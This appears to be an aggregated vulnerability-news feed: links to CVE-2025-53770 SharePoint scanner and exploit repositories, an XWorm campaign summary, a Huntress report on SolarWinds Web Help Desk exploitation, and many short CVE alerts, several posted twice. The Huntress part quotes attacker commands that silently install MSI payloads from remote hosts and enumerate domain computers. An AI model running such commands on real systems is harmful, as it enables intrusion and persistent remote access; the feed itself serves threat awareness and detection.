https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE
https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC
https://github.com/n1chr0x/ZeroPoint
https://github.com/saladin0x1/CVE-2025-53770
https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770
https://github.com/ZephrFish/CVE-2025-53770-Scanner
https://github.com/anwakub/CVE-2025-53770
https://github.com/zach115th/ToolShellFinder
https://github.com/3a7/CVE-2025-53770
https://github.com/kaizensecurity/CVE-2025-53770
https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem
https://github.com/0xray5c68616e37/cve-2025-53770
https://github.com/daryllundy/CVE-2025-53770
https://github.com/RukshanaAlikhan/CVE-2025-53770
https://github.com/tripoloski1337/CVE-2025-53770-scanner
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/soltanali0/CVE-2025-53770-Exploit
https://github.com/r3xbugbounty/CVE-2025-53770
https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance
https://github.com/bitsalv/ToolShell-Honeypot
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/go-bi/sharepoint-CVE-2025-53770
https://github.com/behnamvanda/CVE-2025-53770-Checker
https://github.com/Sec-Dan/CVE-2025-53770-Scanner
https://github.com/hazcod/CVE-2025-53770
https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770
https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner
https://github.com/Udyz/CVE-2025-53770-Exploit
https://github.com/0x-crypt/CVE-2025-53770-Scanner
https://github.com/ghostn4444/CVE-2025-53770
https://github.com/grupooruss/CVE-2025-53770-Checker
https://github.com/yosasasutsut/Blackash-CVE-2025-53770
https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio
https://github.com/siag-itsec/CVE-2025-53770-Hunting
https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend
What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
🔗️ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…
🔗️ [Binarydefense] https://link.is.it/EtPFu3
##What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
🔗️ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…
🔗️ [Binarydefense] https://link.is.it/EtPFu3
##updated 2025-10-22T00:31:30
2 posts
7 repos
https://github.com/zldww2011/CVE-2018-0802_POC
https://github.com/Abdibimantara/Maldoc-Analysis
https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882
https://github.com/roninAPT/CVE-2018-0802
https://github.com/rxwx/CVE-2018-0802
Observed campaign summary:
Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##Observed campaign summary:
Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##updated 2025-09-23T06:30:33
4 posts
1 repos
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##🛡️ CyberHost Malware List Stats 🛡️
3 new domains were added yesterday
Threat Intel Used:
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
Blocklist Details: https://cyberhost.uk/malware-blocklist
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2025-09-17T15:31:32
1 posts
updated 2025-04-28T16:48:57.070000
1 posts
you were literally shown an example of a recent Acrobat Reader bug that potentially could lead to RCE - many other examples are available, like www.cvedetails.com/cve/CVE-2025...; if you want more, Google is right where you left it
CVE-2025-27158 : Acrobat Reade...
updated 2025-04-15T14:24:22
2 posts
Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.
🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3
🚨 CVE-2026-25993 (CRITICAL): EverShop <2.1.1 allows unauthenticated SQL injection via url_key in category handling. Upgrade to 2.1.1+ or enforce input validation now! https://radar.offseq.com/threat/cve-2026-25993-cwe-89-improper-neutralization-of-s-6994a1ac #OffSeq #SQLInjection #Infosec #EverShop #Vuln
##🚨 karutoil catalyst (<11980aaf3f46315b02777f325ba02c56b110165d) faces CRITICAL OS command injection (CVE-2026-26009, CVSS 10.0). Users with template perms can execute root shell commands cluster-wide. Patch immediately! https://radar.offseq.com/threat/cve-2026-26009-cwe-78-improper-neutralization-of-s-ff7845bb #OffSeq #vuln #infosec #CVE202626009
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
🟠 CVE-2026-25931 - High (7.8)
vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25931/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25808 - High (7.5)
Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25808/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25807 - High (8.8)
ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25807/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25880 - High (7.8)
SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, the PDF reader allows execution of a malicious binary (explorer.exe) located in the same directory as the opened PDF when the user clicks File → “Show in folder”. This be...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25880/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25925 - High (7.8)
PowerDocu contains a Windows GUI executable to perform technical documentations. Prior to 2.4.0, PowerDocu contains a critical security vulnerability in how it parses JSON files within Flow or App packages. The application blindly trusts the $type...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25925/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##